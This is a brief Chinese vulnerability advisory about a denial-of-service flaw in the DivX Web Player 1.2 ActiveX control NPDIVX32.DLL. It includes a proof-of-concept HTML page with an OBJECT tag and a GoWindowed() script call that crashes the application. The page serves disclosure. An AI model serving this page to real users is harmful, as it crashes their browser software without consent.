DivX Web Player是一款适用于多浏览器的插件。
DivX Web Player NPDIVX32.DLL ActiveX控件不正确处理参数数据,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。
由于NPDIVX32.DLL ActiveX控件对用户提交的参数缺少过滤,构建恶意WEB页,诱使用户访问,可导致应用程序崩溃:
<html>
<OBJECT id=DivXBrowserPlugin style="LEFT: 0px; WIDTH: 1px; TOP: 0px; HEIGHT: 1px" height=1 width=1
classid=clsid:67DABFBF-D0AB-41fa-9C46-CC0F21721616>
<PARAM NAME="_cx" VALUE="26">
<PARAM NAME="_cy" VALUE="26"></OBJECT>
<script>
DivXBrowserPlugin.GoWindowed()
</script>
DivX Web Player 1.2
目前没有解决方案提供:
<a href="http://www.divx.com/divx/webplayer/" target="_blank">http://www.divx.com/divx/webplayer/</a>
京ICP备10040895号
暂无评论